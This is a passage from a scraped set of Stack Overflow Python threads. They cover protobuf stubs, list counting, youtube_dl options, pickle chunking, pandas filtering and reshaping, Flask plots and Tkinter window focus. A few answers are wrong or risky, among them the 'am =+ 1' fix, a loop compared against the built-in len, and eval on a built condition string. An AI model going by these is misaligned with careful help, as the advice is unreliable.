\x01(\x0b\x32\x05.File\x12\x13\n\x04Size\x18\x02 \x01(\x0b\x32\x05.Size\x12\x0f\n\x07\x43ontent\x18\x03 \x01(\x0c\"%\n\x04Size\x12\r\n\x05Width\x18\x01 \x01(\x05\x12\x0e\n\x06Height\x18\x02 \x01(\x05\"\x0e\n\x0cSendNextFileB\x08\xaa\x02\x05Protob\x06proto3') _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals()) _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'filelist_pb2', globals()) if _descriptor._USE_C_DESCRIPTORS == False: DESCRIPTOR._options = None DESCRIPTOR._serialized_options = b'\252\002\005Proto' _FILELISTREQUEST._serialized_start=18 _FILELISTREQUEST._serialized_end=57 _FILE._serialized_start=59 _FILE._serialized_end=79 _IMAGEFILE._serialized_start=81 _IMAGEFILE._serialized_end=151 _SIZE._serialized_start=153 _SIZE._serialized_end=190 _SENDNEXTFILE._serialized_start=192 _SENDNEXTFILE._serialized_end=206 # @@protoc_insertion_point(module_scope) According to the documentation this file should contain a class for each message type, but it doesn't. Why?
[ "Documentation says:\n\nUnlike when you generate Java and C++ protocol buffer code, the Python\nprotocol buffer compiler doesn't generate your data access code for\nyou directly.\n\nIt means, that your .proto files won't be converted into some familiar accessors (no classes, no methods and no properties defined)\nThen, in docs, you see this:\n\nInstead (as you'll see if you look at addressbook_pb2.py) it generates\nspecial descriptors for all your messages, enums, and fields, and some\nmysteriously empty classes, one for each message type\n\nWhich means:\n\nYou'll see descriptors, parsed from serialized .proto file\nYou'll see variables, named exactly the same as in .proto file\n\nBut these \"variables\" are nothing but GeneratedProtocolMessageType class, which is a metaclass, but for protocol messages\nThen, you should look into docs for GeneratedProtocolMessageType from package google.protobuf.internal.python_message, where you should see this line:\n\nMetaclass for protocol message classes created at runtime from\nDescriptors.\n\nAnd this line means that you won't see any expected properties or methods while you code. Because these variables will become metaclasses for your protocol messages only at runtime!\nThese metaclasses, at the time you look at the lines with their instantiation, are factories for your protocol messages\nMoreover, this behavior is mentioned in the middle of the docs for that class:\n\nThe protocol compiler currently uses this metaclass to create protocol\nmessage classes at runtime.\n\nIt works only that way:\n\nWe add implementations for all methods described in the Message class.\nWe also create properties to allow getting/setting all fields in the\nprotocol message. Finally, we create slots to prevent users from\naccidentally \"setting\" nonexistent fields in the protocol message,\nwhich then wouldn't get serialized / deserialized properly.\n\nThis metaclass generates classes for your protocol messages, described in .proto files, using descriptors from generated files. Only at runtime (not at coding time)\nAnd only at runtime you'll be able to use them as factories for your classes (those, which you expect to see in code) and, also, as a types for method parameters\nSo there is nothing wrong with Google Protobuf Documentation, it is not outdated\n", "I have the same issue. Experimenting with grpc-tools (I found answer in another thread suggesting usage of this tool) I finally found a solution.\nJust add to protoc command this arg: --pyi_out like:\nprotoc --proto_path=. -I . --python_out=..\\..\\python\\Modules\\PreloadingIteratorWrapper\\ --pyi_out=python_out=..\\..\\python\\Modules\\PreloadingIteratorWrapper\\ .\\filelist.proto\nIt will generate for you _bp2.py as well as corresponding _bp2.pyi (stub file). After that your IDE will see the class names, intellisense will work etc.\n" ]
[ 1, 0 ]
[]
[]
[ "protocol_buffers", "python" ]
stackoverflow_0071960226_protocol_buffers_python.txt
Q: Why is my count variable not calculating correct number of True values from the list? I have a list values_count which contains boolean values True and False. I am trying to calculate number of True values present in the list. For example , for the list ltr=[False,True,True,True] I expect my answer to be 3 but my answer comes 0, the initial value of the count variable that I have declared. Below is my code. class Solution(object): def count_true(self, values_count=[]): am = 0 for i in values_count: if values_count[i] == True: am + 1 return am else: pass if __name__ == '__main__': p = Solution() ltr = [False, True, True, True] print(p.count_true(ltr)) A: Actually, am + 1 should be am =+ 1 and return am should be at the last line. However, you can use my code below: def count_true(self, values_count=[]): count = 0 for value in values_count: if value: count += 1 return count Output: > 3 A: why not just ltr = [False, True, True, True] ltr.count(True)
Why is my count variable not calculating correct number of True values from the list?
I have a list values_count which contains boolean values True and False. I am trying to calculate number of True values present in the list. For example , for the list ltr=[False,True,True,True] I expect my answer to be 3 but my answer comes 0, the initial value of the count variable that I have declared. Below is my code. class Solution(object): def count_true(self, values_count=[]): am = 0 for i in values_count: if values_count[i] == True: am + 1 return am else: pass if __name__ == '__main__': p = Solution() ltr = [False, True, True, True] print(p.count_true(ltr))
[ "Actually, am + 1 should be am =+ 1 and return am should be at the last line.\nHowever, you can use my code below:\ndef count_true(self, values_count=[]):\n count = 0\n for value in values_count:\n if value:\n count += 1\n return count\n\nOutput:\n> 3\n\n", "why not just\nltr = [False, True, True, True]\nltr.count(True)\n\n" ]
[ 0, 0 ]
[]
[]
[ "for_loop", "list", "python" ]
stackoverflow_0074575802_for_loop_list_python.txt
Q: How to incorporate options? I am new to web scraping but fortunately I am taking a class that gives us much of the framework needed for scraping certian API's. I want to change the options of which youtube videos I am extracting Info from but I am not sure how. ydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en']} with youtube_dl.YoutubeDL(ydl_opts) as ydl: result = ydl.extract_info("ytsearch100:iPhone 4", --datebefore 2012, download=False) I am getting an error for the --datebefore 2012 and I am not sure where/how this option should be incorporated A: I believe I have figured it out, but I am not 100% that the videos extracted are, in fact, within the specified date: ydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en'], 'datebefore': 2012}
How to incorporate options?
I am new to web scraping but fortunately I am taking a class that gives us much of the framework needed for scraping certian API's. I want to change the options of which youtube videos I am extracting Info from but I am not sure how. ydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en']} with youtube_dl.YoutubeDL(ydl_opts) as ydl: result = ydl.extract_info("ytsearch100:iPhone 4", --datebefore 2012, download=False) I am getting an error for the --datebefore 2012 and I am not sure where/how this option should be incorporated
[ "I believe I have figured it out, but I am not 100% that the videos extracted are, in fact, within the specified date:\nydl_opts = {'dump_single_json': True, 'writeautomaticsub': True, 'subtitleslangs': ['en'], 'datebefore': 2012}\n\n" ]
[ 0 ]
[]
[]
[ "python", "youtube_dl" ]
stackoverflow_0074575883_python_youtube_dl.txt
Q: why is the return of the program not good? I'm new to python and there's a video on Youtube that I watched. I do the exact same code as he but mine doesn't work and I don' understand why. Here's the code: MAX_LINES = 3 def deposit(): while True: amount = input("What would you like to deposit? $") if amount.isdigit(): amount = int(amount) if amount > 0: break else: print("Amount must be greater than 0. ") else: print("Please enter a number. ") return amount def get_number_of_lines(): while True: lines = input("Enter the number of lines to bet on (1-" + str(MAX_LINES) + ")? ") if lines.isdigit(): lines = int(lines) if 1 <= lines <= MAX_LINES: break else: print("Please enter a valid number of lines. ") else: print("Please enter a number. ") return lines There are 3 problems. Unindent amount does not match previous indent. I have no idea what does that mean "return" can be used only within a function. As far as I'm concerned I'm using it in the function, copied the first function then pasted it into the second function and somehow it doesn't work "lines" is not defined. What dou you mean it's not defined, I define it in the first line of the function https://www.youtube.com/watch?v=th4OBktqK1I This video's code what I'm trying to do I appreciate any help! I just simply don't understand why it works in one and not the other A: You have one space too much in front of while True in function get_number_of_lines(). Yes used in functions to return value Because function don't get inside while loop (because of indent problem), lines is never defined, probably this was the problem. So try fix indent and run again
why is the return of the program not good?
I'm new to python and there's a video on Youtube that I watched. I do the exact same code as he but mine doesn't work and I don' understand why. Here's the code: MAX_LINES = 3 def deposit(): while True: amount = input("What would you like to deposit? $") if amount.isdigit(): amount = int(amount) if amount > 0: break else: print("Amount must be greater than 0. ") else: print("Please enter a number. ") return amount def get_number_of_lines(): while True: lines = input("Enter the number of lines to bet on (1-" + str(MAX_LINES) + ")? ") if lines.isdigit(): lines = int(lines) if 1 <= lines <= MAX_LINES: break else: print("Please enter a valid number of lines. ") else: print("Please enter a number. ") return lines There are 3 problems. Unindent amount does not match previous indent. I have no idea what does that mean "return" can be used only within a function. As far as I'm concerned I'm using it in the function, copied the first function then pasted it into the second function and somehow it doesn't work "lines" is not defined. What dou you mean it's not defined, I define it in the first line of the function https://www.youtube.com/watch?v=th4OBktqK1I This video's code what I'm trying to do I appreciate any help! I just simply don't understand why it works in one and not the other
[ "\nYou have one space too much in front of while True in function get_number_of_lines().\nYes used in functions to return value\nBecause function don't get inside while loop (because of indent problem), lines is never defined, probably this was the problem.\n\nSo try fix indent and run again\n" ]
[ 0 ]
[]
[]
[ "python", "return" ]
stackoverflow_0074575758_python_return.txt
Q: How to load Pickle file in chunks? Is there any option to load a pickle file in chunks? I know we can save the data in CSV and load it in chunks. But other than CSV, is there any option to load a pickle file or any python native file in chunks? A: Based on the documentation for Python pickle, there is not currently support for chunking. However, it is possible to split data into chunks and then read in chunks. For example, suppose the original structure is import pickle filename = "myfile.pkl" str_to_save = "myname" with open(filename,'wb') as file_handle: pickle.dump(str_to_save, file_handle) with open(filename,'rb') as file_handle: result = pickle.load(file_handle) print(result) That could be split into two separate pickle files: import pickle filename_1 = "myfile_1.pkl" filename_2 = "myfile_2.pkl" str_to_save = "myname" with open(filename_1,'wb') as file_handle: pickle.dump(str_to_save[0:4], file_handle) with open(filename_2,'wb') as file_handle: pickle.dump(str_to_save[4:], file_handle) with open(filename_1,'rb') as file_handle: result = pickle.load(file_handle) print(result) As per AKX's comment, writing multiple data to a single file also works: import pickle filename = "myfile.pkl" str_to_save = "myname" with open(filename,'wb') as file_handle: pickle.dump(str_to_save[0:4], file_handle) pickle.dump(str_to_save[4:], file_handle) with open(filename,'rb') as file_handle: result = pickle.load(file_handle) print(result) result = pickle.load(file_handle) print(result) A: I had a similar issue, where I wrote a barrel file descriptor pool, and noticed that my pickle files were getting corrupt when I closed a file descriptor. Although you may do multiple dump() operations to an open file descriptor, it's not possible to subsequently do an open('file', 'ab') to start saving a new set of objects. I got around this by doing a pickler.dump(None) as a session terminator right before I had to close the file descriptor, and upon re-opening, I instantiated a new Pickler instance to resume writing to the file. When loading from this file, a None object signified an end-of-session, at which point I instantiated a new Pickler instance with the file descriptor to continue reading the remainder of the multi-session pickle file. This only applies if for some reason you have to close the file descriptor, though. Otherwise, any number of dump() calls can be performed for load() later. A: As far as I understand Pickle, load/dump by chunk is not possible. Pickle intrinsically reads a complete data stream by "chunks" of variable length depending on flags within the data stream. That is what serialization is all about. This datastream itself could have been cut in chunk earlier (say, network transfer), but chunks cannot be pickle/unpickled "on the fly". But maybe something intermediate can be achieved with pickle "buffers" and "out of band" features for very large data. Note this is not exactly a pickle load/save a single pickle file in chunks. It only applies to objects met during the serialization process that declare themselves has being "out of band" (serialized separately). Quoting the Pickler class doc: If buffer_callback is not None, then it can be called any number of times with a buffer view. If the callback returns a false value (such as None), the given buffer is out-of-band; otherwise the buffer is serialized in-band, i.e. inside the pickle stream. (emphasis mine) Quoting the "Out of band" concept doc: In some contexts, the pickle module is used to transfer massive amounts of data. Therefore, it can be important to minimize the number of memory copies, to preserve performance and resource consumption. However, normal operation of the pickle module, as it transforms a graph-like structure of objects into a sequential stream of bytes, intrinsically involves copying data to and from the pickle stream. This constraint can be eschewed if both the provider (the implementation of the object types to be transferred) and the consumer (the implementation of the communications system) support the out-of-band transfer facilities provided by pickle protocol 5 and higher. Example taken from the doc example : b = ZeroCopyByteArray(b"abc") # NB: class has a special __reduce_ex__ and _reconstruct method buffers = [] data = pickle.dumps(b, protocol=5, buffer_callback=buffers.append) # we could do things with these buffers like: # - writing each to a single file, # - sending them over network, # ... new_b = pickle.loads(data, buffers=buffers) # load in chunks From this example, we could consider writing each buffer into a file, or sending each on a network. Then unpickling would be performed by loading those files (or network payloads) and passing to the unpickle. But note that we end up with 2 serialized data in the example: data buffers Not really the OP desire, not exactly pickle load/dump by chunks. From a pickle-to-a-single-file perspective, I don't think this gives any benefit, because we would have to define a custom method to pack into a file both data and buffers, i.e. define a new data format ... feels like ruining the pickle initial benefits. Quoting Unpickler constructor doc: If buffers is not None, it should be an iterable of buffer-enabled objects that is consumed each time the pickle stream references an out-of-band buffer view. Such buffers have been given in order to the buffer_callback of a Pickler object. Changed in version 3.8: The buffers argument was added.
How to load Pickle file in chunks?
Is there any option to load a pickle file in chunks? I know we can save the data in CSV and load it in chunks. But other than CSV, is there any option to load a pickle file or any python native file in chunks?
[ "Based on the documentation for Python pickle, there is not currently support for chunking.\nHowever, it is possible to split data into chunks and then read in chunks. For example, suppose the original structure is\nimport pickle\n\nfilename = \"myfile.pkl\"\nstr_to_save = \"myname\"\n\nwith open(filename,'wb') as file_handle:\n pickle.dump(str_to_save, file_handle)\n \nwith open(filename,'rb') as file_handle:\n result = pickle.load(file_handle)\n\nprint(result)\n\nThat could be split into two separate pickle files:\nimport pickle\n\nfilename_1 = \"myfile_1.pkl\"\nfilename_2 = \"myfile_2.pkl\"\nstr_to_save = \"myname\"\n\nwith open(filename_1,'wb') as file_handle:\n pickle.dump(str_to_save[0:4], file_handle)\nwith open(filename_2,'wb') as file_handle:\n pickle.dump(str_to_save[4:], file_handle)\n \nwith open(filename_1,'rb') as file_handle:\n result = pickle.load(file_handle)\n\nprint(result)\n\nAs per AKX's comment, writing multiple data to a single file also works:\nimport pickle\n\nfilename = \"myfile.pkl\"\nstr_to_save = \"myname\"\n\nwith open(filename,'wb') as file_handle:\n pickle.dump(str_to_save[0:4], file_handle)\n pickle.dump(str_to_save[4:], file_handle)\n \nwith open(filename,'rb') as file_handle:\n result = pickle.load(file_handle)\n print(result)\n result = pickle.load(file_handle)\n print(result)\n\n", "I had a similar issue, where I wrote a barrel file descriptor pool, and noticed that my pickle files were getting corrupt when I closed a file descriptor. Although you may do multiple dump() operations to an open file descriptor, it's not possible to subsequently do an open('file', 'ab') to start saving a new set of objects.\nI got around this by doing a pickler.dump(None) as a session terminator right before I had to close the file descriptor, and upon re-opening, I instantiated a new Pickler instance to resume writing to the file.\nWhen loading from this file, a None object signified an end-of-session, at which point I instantiated a new Pickler instance with the file descriptor to continue reading the remainder of the multi-session pickle file.\nThis only applies if for some reason you have to close the file descriptor, though. Otherwise, any number of dump() calls can be performed for load() later.\n", "As far as I understand Pickle, load/dump by chunk is not possible.\nPickle intrinsically reads a complete data stream by \"chunks\" of variable length depending on flags within the data stream. That is what serialization is all about. This datastream itself could have been cut in chunk earlier (say, network transfer), but chunks cannot be pickle/unpickled \"on the fly\".\n\nBut maybe something intermediate can be achieved with pickle \"buffers\" and \"out of band\" features for very large data.\nNote this is not exactly a pickle load/save a single pickle file in chunks. It only applies to objects met during the serialization process that declare themselves has being \"out of band\" (serialized separately).\nQuoting the Pickler class doc:\n\nIf buffer_callback is not None, then it can be called any number of times with a buffer view. If the callback returns a false value (such as None), the given buffer is out-of-band; otherwise the buffer is serialized in-band, i.e. inside the pickle stream.\n(emphasis mine)\n\nQuoting the \"Out of band\" concept doc:\n\nIn some contexts, the pickle module is used to transfer massive amounts of data. Therefore, it can be important to minimize the number of memory copies, to preserve performance and resource consumption. However, normal operation of the pickle module, as it transforms a graph-like structure of objects into a sequential stream of bytes, intrinsically involves copying data to and from the pickle stream.\n\n\nThis constraint can be eschewed if both the provider (the implementation of the object types to be transferred) and the consumer (the implementation of the communications system) support the out-of-band transfer facilities provided by pickle protocol 5 and higher.\n\nExample taken from the doc example :\nb = ZeroCopyByteArray(b\"abc\") # NB: class has a special __reduce_ex__ and _reconstruct method\nbuffers = []\ndata = pickle.dumps(b, protocol=5, buffer_callback=buffers.append)\n# we could do things with these buffers like:\n# - writing each to a single file,\n# - sending them over network,\n# ...\nnew_b = pickle.loads(data, buffers=buffers) # load in chunks\n\nFrom this example, we could consider writing each buffer into a file, or sending each on a network. Then unpickling would be performed by loading those files (or network payloads) and passing to the unpickle.\nBut note that we end up with 2 serialized data in the example:\n\ndata\nbuffers\n\nNot really the OP desire, not exactly pickle load/dump by chunks.\nFrom a pickle-to-a-single-file perspective, I don't think this gives any benefit, because we would have to define a custom method to pack into a file both data and buffers, i.e. define a new data format ... feels like ruining the pickle initial benefits.\n\nQuoting Unpickler constructor doc:\n\nIf buffers is not None, it should be an iterable of buffer-enabled objects that is consumed each time the pickle stream references an out-of-band buffer view. Such buffers have been given in order to the buffer_callback of a Pickler object.\nChanged in version 3.8: The buffers argument was added.\n\n" ]
[ 0, 0, 0 ]
[]
[]
[ "chunks", "csv", "file", "pickle", "python" ]
stackoverflow_0059983073_chunks_csv_file_pickle_python.txt
Q: Passing a string to pandas.loc There is a pandas data frame for which it is required make a subset using multiple conditions. This works when the conditions are hard-coded: subset_frame = data_frame.loc[(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)] The conditions vary and a function is being created for whatever list of conditions is supplied. A string is produced by the function: mystring = "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" This is fed into .loc: subset_frame= data_frame.loc[mystring] Which returns an error: KeyError: "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" As per first example with subset_frame above, this exact text, copied from the KeyError output and pasted/hard-coded into .loc, runs successfully. A different method, .update, has also been attempted: data_frame.update(data_frame.loc[mystring]) This returns the same error. What is the mistake in my code or my approach? A: You need to use eval : mystring = "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" subset_frame= data_frame.loc[eval(mystring)]
Passing a string to pandas.loc
There is a pandas data frame for which it is required make a subset using multiple conditions. This works when the conditions are hard-coded: subset_frame = data_frame.loc[(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)] The conditions vary and a function is being created for whatever list of conditions is supplied. A string is produced by the function: mystring = "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" This is fed into .loc: subset_frame= data_frame.loc[mystring] Which returns an error: KeyError: "(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)" As per first example with subset_frame above, this exact text, copied from the KeyError output and pasted/hard-coded into .loc, runs successfully. A different method, .update, has also been attempted: data_frame.update(data_frame.loc[mystring]) This returns the same error. What is the mistake in my code or my approach?
[ "You need to use eval :\nmystring = \"(data_frame['Quantity'] >5) & (data_frame['Discount'] >0)\"\n\nsubset_frame= data_frame.loc[eval(mystring)]\n\n" ]
[ 1 ]
[]
[]
[ "pandas", "python", "string" ]
stackoverflow_0074575882_pandas_python_string.txt
Q: Graphs overlap each other when showing them in a Flask application I would like to show multiple graphs on a webpage, build with flask. The graphs work fine when I run them separately, but when I try to show them on the same page, they overlap. main.py @main.route('/filetypebarchart', methods=["GET"]) def filetypebarchart(): fig1 =plt.figure("1") df = pd.read_csv('./export_dataframe.csv') df.value_counts() fig1 = df.type.value_counts().plot(kind = 'barh').get_figure() fig1.savefig('./project/filetypebarchart.png') return send_file("filetypebarchart.png",mimetype='img/png') @main.route('/filetypesum', methods=["GET"]) def filetypesum(): fig2 = plt.figure("2") df = pd.read_csv('./export_dataframe.csv') fig2 = sns.barplot(data=df, x="type", y="size", estimator="sum", palette="pastel") fig2.figure.savefig('./project/filetypesum.png') return send_file("filetypesum.png",mimetype='img/png') html code <div> <img src="/filetypebarchart" alt="Chart" height="auto" width="100%"> <br><br> <img src="/filetypesum" alt="Chart" height="auto" width="100%"> </div> The outcome A: Ooh meanwhile, I found out myself. I needed to add the following line to close the plot. plt.close(fig1) So now it looks like this. @main.route('/filetypebarchart', methods=["GET"]) def filetypebarchart(): fig1 =plt.figure("1") df = pd.read_csv('./export_dataframe.csv') df.value_counts() fig1 = df.type.value_counts().plot(kind = 'barh').get_figure() fig1.savefig('./project/filetypebarchart.png') plt.close(fig1) return send_file("filetypebarchart.png",mimetype='img/png')
Graphs overlap each other when showing them in a Flask application
I would like to show multiple graphs on a webpage, build with flask. The graphs work fine when I run them separately, but when I try to show them on the same page, they overlap. main.py @main.route('/filetypebarchart', methods=["GET"]) def filetypebarchart(): fig1 =plt.figure("1") df = pd.read_csv('./export_dataframe.csv') df.value_counts() fig1 = df.type.value_counts().plot(kind = 'barh').get_figure() fig1.savefig('./project/filetypebarchart.png') return send_file("filetypebarchart.png",mimetype='img/png') @main.route('/filetypesum', methods=["GET"]) def filetypesum(): fig2 = plt.figure("2") df = pd.read_csv('./export_dataframe.csv') fig2 = sns.barplot(data=df, x="type", y="size", estimator="sum", palette="pastel") fig2.figure.savefig('./project/filetypesum.png') return send_file("filetypesum.png",mimetype='img/png') html code <div> <img src="/filetypebarchart" alt="Chart" height="auto" width="100%"> <br><br> <img src="/filetypesum" alt="Chart" height="auto" width="100%"> </div> The outcome
[ "Ooh meanwhile, I found out myself.\nI needed to add the following line to close the plot.\nplt.close(fig1)\n\nSo now it looks like this.\n@main.route('/filetypebarchart', methods=[\"GET\"])\ndef filetypebarchart():\n fig1 =plt.figure(\"1\")\n\n df = pd.read_csv('./export_dataframe.csv') \n \n df.value_counts()\n fig1 = df.type.value_counts().plot(kind = 'barh').get_figure()\n fig1.savefig('./project/filetypebarchart.png')\n\n plt.close(fig1)\n\n return send_file(\"filetypebarchart.png\",mimetype='img/png')\n\n" ]
[ 0 ]
[]
[]
[ "flask", "matplotlib", "python" ]
stackoverflow_0074575666_flask_matplotlib_python.txt
Q: Print every two pairs in a new line from array of elements in Python How can I print from an array of elements in Python every second pair of elements one below another, without commas and brackets? My array looks like this: m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] And, I want to print in one of the cases: 1 2 5 6 9 10 or in another case: 3 4 7 8 11 12 I didn't know how to do that, so i created two separate arrays, but when i try to print elements in separate rows, each pair has brackets and coma. Is there any way to solve this easier and to make it look as i wrote? What I've tried: a=[m[j:j+2] for j in range(0,len(m),2)] a1=m[::2] a2=m[1::2] if s1>s2: print("\n".join(map(str,a1))) elif s1<s2: print("\n".join(map(str,a2))) My current output: [3, 4] [7, 8] [11, 12] A: You could use a while loop m = [1,2,3,4,5,6,7,8,9] idx = 0 try: while idx < len: print(m[idx], m[idx+1]) idx += 3 except IndexError: print("Index out of bounds") Just change the start Index (idx) for the other print A: Another way to do it like this- m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] pairs = [[i, i+1] for i in m[::2]] results = [], [] for i, e in enumerate(pairs): results[i%2].append(e) for i in results: for p in i: print(*p) print("-----") Output: 1 2 5 6 9 10 ----- 3 4 7 8 11 12 ----- A: I don't understand why all the solutions are so complex, this is as simple as follows (case 1): len_m = len(m) for i in range(0, len_m - 1 if len_m & 1 else len_m, 4): print(f"{m[i]} {m[i + 1]}") For case 2, just start the range with 2. A: what you are trying to achieve is making a pair of 2 in array and save alternative pair in a different arrays/list. one way of achiving this is below code, by going step by step. m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] make_pair = [(m[i], m[i+1]) for i in range(0, len(m), 2)] res1 = [] res2 = [] print(make_pair) # [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10), (11, 12)] for i in range(len(make_pair)): if i%2: res2.append(make_pair[i]) else: res1.append(make_pair[i]) print(res1) # [(1, 2), (5, 6), (9, 10)] print(res2) # [(3, 4), (7, 8), (11, 12)] if you want to go in one go, ie without creating pair array, then using temporary stack you can achieve same result
Print every two pairs in a new line from array of elements in Python
How can I print from an array of elements in Python every second pair of elements one below another, without commas and brackets? My array looks like this: m=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12] And, I want to print in one of the cases: 1 2 5 6 9 10 or in another case: 3 4 7 8 11 12 I didn't know how to do that, so i created two separate arrays, but when i try to print elements in separate rows, each pair has brackets and coma. Is there any way to solve this easier and to make it look as i wrote? What I've tried: a=[m[j:j+2] for j in range(0,len(m),2)] a1=m[::2] a2=m[1::2] if s1>s2: print("\n".join(map(str,a1))) elif s1<s2: print("\n".join(map(str,a2))) My current output: [3, 4] [7, 8] [11, 12]
[ "You could use a while loop\nm = [1,2,3,4,5,6,7,8,9] \nidx = 0\ntry:\n while idx < len:\n print(m[idx], m[idx+1]) \n idx += 3\nexcept IndexError:\n print(\"Index out of bounds\") \n\nJust change the start Index (idx) for the other print\n", "Another way to do it like this-\nm=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\npairs = [[i, i+1] for i in m[::2]]\nresults = [], []\nfor i, e in enumerate(pairs):\n results[i%2].append(e)\n\nfor i in results:\n for p in i:\n print(*p)\n print(\"-----\")\n\nOutput:\n1 2\n5 6\n9 10\n-----\n3 4\n7 8\n11 12\n-----\n\n", "I don't understand why all the solutions are so complex, this is as simple as follows (case 1):\nlen_m = len(m)\nfor i in range(0, len_m - 1 if len_m & 1 else len_m, 4):\n print(f\"{m[i]} {m[i + 1]}\")\n\nFor case 2, just start the range with 2.\n", "what you are trying to achieve is making a pair of 2 in array and save alternative pair in a different arrays/list. one way of achiving this is below code, by going step by step.\nm=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\nmake_pair = [(m[i], m[i+1]) for i in range(0, len(m), 2)]\n\nres1 = []\nres2 = []\n\nprint(make_pair)\n# [(1, 2), (3, 4), (5, 6), (7, 8), (9, 10), (11, 12)]\nfor i in range(len(make_pair)):\n if i%2:\n res2.append(make_pair[i])\n else:\n res1.append(make_pair[i])\n\n\nprint(res1)\n# [(1, 2), (5, 6), (9, 10)]\nprint(res2)\n# [(3, 4), (7, 8), (11, 12)]\n\nif you want to go in one go, ie without creating pair array, then using temporary stack you can achieve same result\n" ]
[ 0, 0, 0, 0 ]
[]
[]
[ "arrays", "printing", "python", "python_3.x" ]
stackoverflow_0074575687_arrays_printing_python_python_3.x.txt
Q: Keys and Values as two columns? I have a data frame with several columns. Each of the column headers is a unique category and the rows below it contain a list of items in that category. I would like to transform it into two columns. Ideally, the first column would have all of the items listed and the second column would have the corresponding category. I feel like this should be simple but I'm hitting a brick wall. A: You can use pandas.melt function for that : import pandas as pd df = pd.DataFrame({ "Birds": ["Eagle", "Swan", "Robi"], "Fish": ["cod", "salmon", "Haddock"], "Farm animals": ["Pig", "horse", "hen"] }) df df = df.melt(value_vars=df.columns).rename(columns={"variable": "Categories", "value": "Animals"}) df
Keys and Values as two columns?
I have a data frame with several columns. Each of the column headers is a unique category and the rows below it contain a list of items in that category. I would like to transform it into two columns. Ideally, the first column would have all of the items listed and the second column would have the corresponding category. I feel like this should be simple but I'm hitting a brick wall.
[ "You can use pandas.melt function for that :\nimport pandas as pd\n\ndf = pd.DataFrame({\n \"Birds\": [\"Eagle\", \"Swan\", \"Robi\"],\n \"Fish\": [\"cod\", \"salmon\", \"Haddock\"],\n \"Farm animals\": [\"Pig\", \"horse\", \"hen\"]\n})\n\ndf\n\n\ndf = df.melt(value_vars=df.columns).rename(columns={\"variable\": \"Categories\", \"value\": \"Animals\"})\ndf\n\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074575564_dataframe_pandas_python.txt
Q: How to make a Tkinter window jump to the front? How do I get a Tkinter application to jump to the front? Currently, the window appears behind all my other windows and doesn't get focus. Is there some method I should be calling? A: Assuming you mean your application windows when you say "my other windows", you can use the lift() method on a Toplevel or Tk: root.lift() If you want the window to stay above all other windows, use: root.attributes("-topmost", True) Where root is your Toplevel or Tk. Don't forget the - infront of "topmost"! To make it temporary, disable topmost right after: def raise_above_all(window): window.attributes('-topmost', 1) window.attributes('-topmost', 0) Just pass in the window you want to raise as a argument, and this should work. A: Add the following lines before the mainloop(): root.lift() root.attributes('-topmost',True) root.after_idle(root.attributes,'-topmost',False) It works perfectly for me. It makes the window come to the front when the window is generated, and it won't keep it always be in the front. A: If you're doing this on a Mac, use AppleEvents to give focus to Python. Eg: import os os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''') A: Regarding the Mac, I noticed there can be a problem in that if there are multiple python GUIs running, every process will be named "Python" and AppleScript will tend to promote the wrong one to the front. Here's my solution. The idea is to grab a list of running process IDs before and after you load Tkinter. (Note that these are AppleScript process IDs which seem to bear no relation to their posix counterparts. Go figure.) Then the odd man out will be yours and you move that one to frontmost. (I didn't think that loop at the end would be necessary, but if you simply get every process whose ID is procID, AppleScript apparently returns the one object identified by name, which of course is that non-unique "Python", so we are back to square one unless there's something I'm missing.) import Tkinter, subprocess def applescript(script): return subprocess.check_output(['/usr/bin/osascript', '-e', script]) def procidset(): return set(applescript( 'tell app "System Events" to return id of every process whose name is "Python"' ).replace(',','').split()) idset = procidset() root = Tkinter.Tk() procid = iter(procidset() - idset).next() applescript(''' tell app "System Events" repeat with proc in every process whose name is "Python" if id of proc is ''' + procid + ''' then set frontmost of proc to true exit repeat end if end repeat end tell''') A: On Mac OS X PyObjC provides a cleaner and less error prone method than shelling out to osascript: import os from Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps app = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid()) app.activateWithOptions_(NSApplicationActivateIgnoringOtherApps) A: Recently, I had the same question on the Mac. I have combined several answers using @MagerValp for the Mac and @D K for other systems: import platform if platform.system() != 'Darwin': root.lift() root.call('wm', 'attributes', '.', '-topmost', True) root.after_idle(root.call, 'wm', 'attributes', '.', '-topmost', False) else: import os from Cocoa import NSRunningApplication, NSApplicationActivateIgnoringOtherApps app = NSRunningApplication.runningApplicationWithProcessIdentifier_(os.getpid()) app.activateWithOptions_(NSApplicationActivateIgnoringOtherApps) root.mainloop() A: Somewhat of a combination of various other methods, this works on OS X 10.11, and Python 3.5.1 running in a venv, and should work on other platforms too. It also targets the app by process id rather than app name. from tkinter import Tk import os import subprocess import platform def raise_app(root: Tk): root.attributes("-topmost", True) if platform.system() == 'Darwin': tmpl = 'tell application "System Events" to set frontmost of every process whose unix id is {} to true' script = tmpl.format(os.getpid()) output = subprocess.check_call(['/usr/bin/osascript', '-e', script]) root.after(0, lambda: root.attributes("-topmost", False)) You call it right before the mainloop() call, like so: raise_app(root) root.mainloop() A: There's a hint on how to make the Tkinter window take focus when you call mainloop() in the Tkinter._test() function. # The following three commands are needed so the window pops # up on top on Windows... root.iconify() root.update() root.deiconify() root.mainloop() This is the cleanest most proper way I've found to do this, but it's only needed for Windows systems. A: This answer 